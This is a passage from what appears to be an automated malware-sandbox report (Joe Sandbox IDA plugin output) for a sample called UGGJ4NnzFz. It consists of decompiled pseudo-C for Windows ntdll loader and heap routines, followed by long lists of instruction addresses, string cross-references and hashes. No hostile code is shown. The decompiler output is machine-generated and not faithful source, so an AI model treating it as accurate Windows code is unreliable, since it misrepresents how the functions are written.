											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0xa85c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0xa85c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E009DF380(_t136, 0x971184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E009B2280(_t108, 0xa886cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E009C61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E00A69D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E009AFFB0(_t118, _t156, 0xa886cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E009D9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                                                0x009a8799
                                                                                                                0x009a879d
                                                                                                                0x009a87a1
                                                                                                                0x009a87a3
                                                                                                                0x009a87a8
                                                                                                                0x009a87c3
                                                                                                                0x009a87c3
                                                                                                                0x009a87c8
                                                                                                                0x009a87d1
                                                                                                                0x009a87d4
                                                                                                                0x009a87d8
                                                                                                                0x009a87e5
                                                                                                                0x009a87ec
                                                                                                                0x009f9bfe
                                                                                                                0x009f9c00
                                                                                                                0x009f9c02
                                                                                                                0x009f9c08
                                                                                                                0x009f9c0d
                                                                                                                0x009f9c0f
                                                                                                                0x009f9c14
                                                                                                                0x009f9c2d
                                                                                                                0x009f9c32
                                                                                                                0x009f9c37
                                                                                                                0x009f9c3a
                                                                                                                0x009f9c3c
                                                                                                                0x009f9c42
                                                                                                                0x009f9c42
                                                                                                                0x009f9c3c
                                                                                                                0x009f9c02
                                                                                                                0x009a87da
                                                                                                                0x009a87df
                                                                                                                0x009a87e3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009a87e3
                                                                                                                0x009a87f2
                                                                                                                0x00000000
                                                                                                                0x009a87fb
                                                                                                                0x009a87fd
                                                                                                                0x009a87fe
                                                                                                                0x009a880e
                                                                                                                0x009a880f
                                                                                                                0x009a8810
                                                                                                                0x009a8814
                                                                                                                0x009a881a
                                                                                                                0x009a881c
                                                                                                                0x009a881f
                                                                                                                0x009a8821
                                                                                                                0x009a8822
                                                                                                                0x009a8824
                                                                                                                0x009a8826
                                                                                                                0x009a882c
                                                                                                                0x009a882e
                                                                                                                0x009f9c48
                                                                                                                0x009f9c48
                                                                                                                0x009a8834
                                                                                                                0x009a8834
                                                                                                                0x009a8837
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009a8837
                                                                                                                0x009a882e
                                                                                                                0x009a883d
                                                                                                                0x009a8840
                                                                                                                0x009a8843
                                                                                                                0x009a8846
                                                                                                                0x009a8849
                                                                                                                0x009a884c
                                                                                                                0x009a884e
                                                                                                                0x009a8850
                                                                                                                0x009a8852
                                                                                                                0x009a8854
                                                                                                                0x009a8857
                                                                                                                0x009a88b4
                                                                                                                0x009a88b6
                                                                                                                0x009a88b6
                                                                                                                0x009a8859
                                                                                                                0x009a8859
                                                                                                                0x009a8859
                                                                                                                0x009a8861
                                                                                                                0x009a8866
                                                                                                                0x009a886a
                                                                                                                0x009a893d
                                                                                                                0x009a8941
                                                                                                                0x00000000
                                                                                                                0x009a8947
                                                                                                                0x009a8947
                                                                                                                0x009a894a
                                                                                                                0x009a894c
                                                                                                                0x00000000
                                                                                                                0x009a8952
                                                                                                                0x009a8955
                                                                                                                0x009a895a
                                                                                                                0x009a895d
                                                                                                                0x009a895d
                                                                                                                0x009a895f
                                                                                                                0x009a8961
                                                                                                                0x009a8961
                                                                                                                0x009a8968
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009a896a
                                                                                                                0x009a896b
                                                                                                                0x009a896e
                                                                                                                0x00000000
                                                                                                                0x009a8970
                                                                                                                0x009a8970
                                                                                                                0x009a8970
                                                                                                                0x009a8970
                                                                                                                0x009a8972
                                                                                                                0x009a8972
                                                                                                                0x009a8974
                                                                                                                0x00000000
                                                                                                                0x009a897a
                                                                                                                0x009a897a
                                                                                                                0x009a897d
                                                                                                                0x00000000
                                                                                                                0x009a8983
                                                                                                                0x009f9c65
                                                                                                                0x009f9c6d
                                                                                                                0x009f9c72
                                                                                                                0x009f9c75
                                                                                                                0x009f9c75
                                                                                                                0x009f9c82
                                                                                                                0x009f9c86
                                                                                                                0x009f9c87
                                                                                                                0x009f9c88
                                                                                                                0x009f9c89
                                                                                                                0x009f9c8c
                                                                                                                0x009f9c90
                                                                                                                0x009f9c95
                                                                                                                0x009f9c97
                                                                                                                0x009f9ca0
                                                                                                                0x009f9ca3
                                                                                                                0x009f9ca9
                                                                                                                0x009f9ca9
                                                                                                                0x00000000
                                                                                                                0x009f9ca9
                                                                                                                0x009f9ca3
                                                                                                                0x00000000
                                                                                                                0x009f9c97
                                                                                                                0x009a897d
                                                                                                                0x00000000
                                                                                                                0x009a8974
                                                                                                                0x009a8988
                                                                                                                0x009a8992
                                                                                                                0x009a8996
                                                                                                                0x00000000
                                                                                                                0x009a8996
                                                                                                                0x009a894c
                                                                                                                0x00000000
                                                                                                                0x009a8870
                                                                                                                0x009a887b
                                                                                                                0x009a887d
                                                                                                                0x009a887f
                                                                                                                0x009a8881
                                                                                                                0x009a8884
                                                                                                                0x009a8884
                                                                                                                0x009a8886
                                                                                                                0x009a8889
                                                                                                                0x009a888c
                                                                                                                0x009a888e
                                                                                                                0x009a8891
                                                                                                                0x009a8891
                                                                                                                0x009a8898
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009a889a
                                                                                                                0x009a889b
                                                                                                                0x009a889e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009a88a0
                                                                                                                0x009a88a8
                                                                                                                0x009a88b0
                                                                                                                0x009a88b2
                                                                                                                0x009a88d3
                                                                                                                0x009a88d5
                                                                                                                0x00000000
                                                                                                                0x009a88d7
                                                                                                                0x009a88db
                                                                                                                0x009a88dc
                                                                                                                0x009a88e0
                                                                                                                0x009a88e8
                                                                                                                0x009a88ee
                                                                                                                0x009a88f0
                                                                                                                0x009a88f3
                                                                                                                0x009a88fc
                                                                                                                0x009a8901
                                                                                                                0x009a8906
                                                                                                                0x009a890c
                                                                                                                0x009a890c
                                                                                                                0x009a890f
                                                                                                                0x009a8916
                                                                                                                0x009a8917
                                                                                                                0x009a8918
                                                                                                                0x009a8919
                                                                                                                0x009a891a
                                                                                                                0x009a891f
                                                                                                                0x009a8921
                                                                                                                0x009f9c52
                                                                                                                0x009f9c55
                                                                                                                0x009f9c5b
                                                                                                                0x009f9cac
                                                                                                                0x009f9cc0
                                                                                                                0x009f9cc0
                                                                                                                0x009f9c55
                                                                                                                0x009a8927
                                                                                                                0x009a8927
                                                                                                                0x009a892f
                                                                                                                0x009a8933
                                                                                                                0x00000000
                                                                                                                0x009a88f5
                                                                                                                0x009a88f5
                                                                                                                0x00000000
                                                                                                                0x009a88f7
                                                                                                                0x009a88f7
                                                                                                                0x009a88fa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009a88fa
                                                                                                                0x009a88f5
                                                                                                                0x009a88f3
                                                                                                                0x00000000
                                                                                                                0x009a88d5
                                                                                                                0x00000000
                                                                                                                0x009a88b2
                                                                                                                0x009a88c9
                                                                                                                0x00000000
                                                                                                                0x009a88c9
                                                                                                                0x009a887f
                                                                                                                0x009a886a
                                                                                                                0x009a8857
                                                                                                                0x009a8852
                                                                                                                0x009a88bf
                                                                                                                0x009a88bf
                                                                                                                0x009a87aa
                                                                                                                0x009a87ad
                                                                                                                0x009a87ae
                                                                                                                0x009a87b4
                                                                                                                0x009a87b5
                                                                                                                0x009a87b6
                                                                                                                0x009a87b8
                                                                                                                0x009a87bd
                                                                                                                0x009a87c1
                                                                                                                0x009a87f4
                                                                                                                0x009a87fa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009a87c1
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                • LdrpDoPostSnapWork, xrefs: 009F9C1E
                                                                                                                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 009F9C18
                                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 009F9C28
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                                • API String ID: 2994545307-1948996284
                                                                                                                • Opcode ID: af0ae83876efb43befe068fe776f59d4adb6ef81fe5a501197678902da7d38fb
                                                                                                                • Instruction ID: d7ed3fababcd42c138dd5648283a79b2d9bfbde9ff6c0ba98d12fec8e300d4d3
                                                                                                                • Opcode Fuzzy Hash: af0ae83876efb43befe068fe776f59d4adb6ef81fe5a501197678902da7d38fb
                                                                                                                • Instruction Fuzzy Hash: 95910071A0021AAFDF18DF58C885ABBB3B9FF86314B544069E915AB251EF30ED01CBD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009BB73D, Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 74%
                                                                                                                			E009BB73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E00A5A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0xa88748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E0099B150();
					} else {
						E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E0099B150();
					__eflags =  *0xa87bc8;
					if(__eflags == 0) {
						E00A52073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E00A5A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0xa88720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0xa88720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E009BB8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E00A5A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E009BE4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                                                                                                                0x009bb746
                                                                                                                0x009bb74b
                                                                                                                0x009bb74d
                                                                                                                0x009bb750
                                                                                                                0x009bb755
                                                                                                                0x009bb758
                                                                                                                0x009bb758
                                                                                                                0x009bb75e
                                                                                                                0x009bb763
                                                                                                                0x009bb764
                                                                                                                0x009bb76a
                                                                                                                0x009bb76d
                                                                                                                0x009bb771
                                                                                                                0x009bb776
                                                                                                                0x009bb85c
                                                                                                                0x009bb85d
                                                                                                                0x009bb860
                                                                                                                0x009bb865
                                                                                                                0x00a02ba1
                                                                                                                0x00a02ba2
                                                                                                                0x00a02ba9
                                                                                                                0x00a02bae
                                                                                                                0x00a02bae
                                                                                                                0x009bb77c
                                                                                                                0x009bb77c
                                                                                                                0x009bb77c
                                                                                                                0x009bb785
                                                                                                                0x009bb788
                                                                                                                0x00a02bb6
                                                                                                                0x00a02bb9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a02bbf
                                                                                                                0x00a02bc5
                                                                                                                0x00a02bc9
                                                                                                                0x00a02be8
                                                                                                                0x00a02bed
                                                                                                                0x00a02bcb
                                                                                                                0x00a02be0
                                                                                                                0x00a02be5
                                                                                                                0x00a02bf3
                                                                                                                0x00a02bf8
                                                                                                                0x00a02bfd
                                                                                                                0x00a02c05
                                                                                                                0x00a02c0e
                                                                                                                0x00a02c0e
                                                                                                                0x00000000
                                                                                                                0x009bb78e
                                                                                                                0x009bb78e
                                                                                                                0x009bb78e
                                                                                                                0x009bb791
                                                                                                                0x009bb791
                                                                                                                0x009bb797
                                                                                                                0x009bb797
                                                                                                                0x009bb79f
                                                                                                                0x009bb7a9
                                                                                                                0x009bb7af
                                                                                                                0x009bb7af
                                                                                                                0x009bb7b1
                                                                                                                0x009bb7b6
                                                                                                                0x009bb7e2
                                                                                                                0x009bb7e2
                                                                                                                0x009bb7e7
                                                                                                                0x009bb880
                                                                                                                0x009bb7ed
                                                                                                                0x009bb7ed
                                                                                                                0x009bb7ed
                                                                                                                0x009bb7ef
                                                                                                                0x009bb7f2
                                                                                                                0x009bb7f2
                                                                                                                0x009bb7f5
                                                                                                                0x009bb7fa
                                                                                                                0x00a02c2d
                                                                                                                0x00a02c2e
                                                                                                                0x00a02c39
                                                                                                                0x009bb800
                                                                                                                0x009bb800
                                                                                                                0x009bb802
                                                                                                                0x009bb805
                                                                                                                0x009bb808
                                                                                                                0x009bb808
                                                                                                                0x009bb80a
                                                                                                                0x009bb80d
                                                                                                                0x009bb816
                                                                                                                0x009bb81c
                                                                                                                0x009bb822
                                                                                                                0x009bb82f
                                                                                                                0x009bb88b
                                                                                                                0x009bb892
                                                                                                                0x009bb897
                                                                                                                0x009bb899
                                                                                                                0x009bb89b
                                                                                                                0x009bb89e
                                                                                                                0x009bb8a5
                                                                                                                0x009bb8a8
                                                                                                                0x009bb8aa
                                                                                                                0x009bb8ac
                                                                                                                0x009bb8ac
                                                                                                                0x009bb8aa
                                                                                                                0x009bb892
                                                                                                                0x009bb831
                                                                                                                0x009bb839
                                                                                                                0x009bb83b
                                                                                                                0x009bb83b
                                                                                                                0x009bb844
                                                                                                                0x009bb84b
                                                                                                                0x009bb852
                                                                                                                0x009bb7b8
                                                                                                                0x009bb7ba
                                                                                                                0x009bb7bf
                                                                                                                0x009bb7c4
                                                                                                                0x00a02c18
                                                                                                                0x00a02c19
                                                                                                                0x00a02c23
                                                                                                                0x009bb7ca
                                                                                                                0x009bb7ca
                                                                                                                0x009bb7cc
                                                                                                                0x009bb7cf
                                                                                                                0x009bb7d1
                                                                                                                0x009bb7d1
                                                                                                                0x009bb7d4
                                                                                                                0x009bb7dc
                                                                                                                0x009bb8bb
                                                                                                                0x009bb8bb
                                                                                                                0x009bb8be
                                                                                                                0x009bb8be
                                                                                                                0x009bb8c1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009bb8c3
                                                                                                                0x009bb8c5
                                                                                                                0x009bb8c7
                                                                                                                0x009bb8e0
                                                                                                                0x00000000
                                                                                                                0x009bb8e0
                                                                                                                0x009bb8cc
                                                                                                                0x009bb8cc
                                                                                                                0x00000000
                                                                                                                0x009bb8cc
                                                                                                                0x009bb8d6
                                                                                                                0x009bb8d6
                                                                                                                0x00000000
                                                                                                                0x009bb7dc
                                                                                                                0x009bb7b6

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                • API String ID: 0-1334570610
                                                                                                                • Opcode ID: de3845190cce62be679399ba396d06cd012162ebd74fbbf549be9a80aeae43f4
                                                                                                                • Instruction ID: c4d13ebe93a8925b2d479323284aa260081c7b0ea4dd0ba55a750d54c2dc63f1
                                                                                                                • Opcode Fuzzy Hash: de3845190cce62be679399ba396d06cd012162ebd74fbbf549be9a80aeae43f4
                                                                                                                • Instruction Fuzzy Hash: 7661E570600305DFDB28DF28C685BAABBE9FF45314F24855DE8498B691DBB4E881CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009A7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E009A7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E009ACEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0099C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0xa85780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E00A15510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0xa85780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E009B7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E009B7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E00A17016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E009B7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E009B7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E00A17016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E009CA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0099B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                                                0x009a7e4c
                                                                                                                0x009a7e50
                                                                                                                0x009a7e55
                                                                                                                0x009a7e58
                                                                                                                0x009a7e5d
                                                                                                                0x009a7e71
                                                                                                                0x009a7f33
                                                                                                                0x009a7e77
                                                                                                                0x009a7e77
                                                                                                                0x009a7e79
                                                                                                                0x009a7e79
                                                                                                                0x009a7e7e
                                                                                                                0x009a7f45
                                                                                                                0x009f9848
                                                                                                                0x00000000
                                                                                                                0x009f9848
                                                                                                                0x009a7f4e
                                                                                                                0x009a7f53
                                                                                                                0x009a7f5a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009f985a
                                                                                                                0x009f9862
                                                                                                                0x009f9866
                                                                                                                0x00000000
                                                                                                                0x009f986c
                                                                                                                0x00000000
                                                                                                                0x009f986c
                                                                                                                0x009a7e84
                                                                                                                0x009a7e84
                                                                                                                0x009a7e8d
                                                                                                                0x009f9871
                                                                                                                0x009a7eb8
                                                                                                                0x009a7ec0
                                                                                                                0x009a7ec0
                                                                                                                0x009a7e9a
                                                                                                                0x009f987e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009f9884
                                                                                                                0x009f988b
                                                                                                                0x009f98a7
                                                                                                                0x009f98ac
                                                                                                                0x009f98b1
                                                                                                                0x009f98b6
                                                                                                                0x009f98b8
                                                                                                                0x009f98b8
                                                                                                                0x009f98b9
                                                                                                                0x00000000
                                                                                                                0x009f98b9
                                                                                                                0x009a7ea0
                                                                                                                0x009a7ea7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009a7eac
                                                                                                                0x009a7eb1
                                                                                                                0x009a7ec6
                                                                                                                0x009a7ed0
                                                                                                                0x009f98cc
                                                                                                                0x009a7ed6
                                                                                                                0x009a7ed6
                                                                                                                0x009a7ed6
                                                                                                                0x009a7ede
                                                                                                                0x009a7ee3
                                                                                                                0x009f98e3
                                                                                                                0x009f98f0
                                                                                                                0x009f9902
                                                                                                                0x009f98f2
                                                                                                                0x009f98fb
                                                                                                                0x009f98fb
                                                                                                                0x009f9907
                                                                                                                0x009f991d
                                                                                                                0x009f991d
                                                                                                                0x009f9907
                                                                                                                0x009f98e3
                                                                                                                0x009a7ef0
                                                                                                                0x009a7f14
                                                                                                                0x009a7f14
                                                                                                                0x009a7f1e
                                                                                                                0x009f9946
                                                                                                                0x009a7f24
                                                                                                                0x009a7f24
                                                                                                                0x009a7f24
                                                                                                                0x009a7f2c
                                                                                                                0x009f996a
                                                                                                                0x009f9975
                                                                                                                0x009f9975
                                                                                                                0x009f997e
                                                                                                                0x009f9993
                                                                                                                0x009f9993
                                                                                                                0x009f997e
                                                                                                                0x00000000
                                                                                                                0x009a7ef2
                                                                                                                0x009a7efc
                                                                                                                0x009a7f0a
                                                                                                                0x009a7f0e
                                                                                                                0x009f9933
                                                                                                                0x00000000
                                                                                                                0x009f9933
                                                                                                                0x00000000
                                                                                                                0x009a7f0e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009a7eb1

                                                                                                                Strings
                                                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 009F98A2
                                                                                                                • LdrpCompleteMapModule, xrefs: 009F9898
